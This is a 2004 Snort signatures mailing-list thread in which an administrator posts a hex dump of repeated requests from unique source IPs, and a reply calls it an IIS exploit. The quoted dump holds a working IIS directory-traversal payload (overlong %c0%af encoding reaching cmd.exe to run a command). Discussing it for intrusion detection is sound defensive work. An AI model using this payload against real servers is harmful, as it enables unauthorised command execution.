[Snort-sigs] Weird new CMD.EXE payload...

K. Jared Kalisz jkalisz at ...2550...
Wed Jun 16 08:11:10 EDT 2004


I thought as much. I just have not seen this particular payload before... I
thought maybe others would be experiencing this. What's weird is that it is
coming from different IP addresses; so far, never the same address twice.
The attempts are rolling in, about one every 2-5 minutes. Never seen a
pattern like this... Also, it is targeting ALL of my web servers,
regardless of type (i.e. IIS, Apache, etc.).

So I agree that it is just an IIS exploit, the likes of which I see hundreds
a day. It's more the pattern (frequency of attacks/always a unique source
IP) and the payload that is odd/different, hence the concern.

Thanks,
Jared


-----Original Message-----
From: snort-sigs-admin at lists.sourceforge.net
[mailto:snort-sigs-admin at lists.sourceforge.net] On Behalf Of Roach4
Sent: Wednesday, June 16, 2004 9:54 AM
To: K. Jared Kalisz
Cc: snort-sigs at lists.sourceforge.net
Subject: Re: [Snort-sigs] Weird new CMD.EXE payload...

Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too... One attempt
> from each source address. They keep pouring in...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060

_______________________________________________
Snort-sigs mailing list
Snort-sigs at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs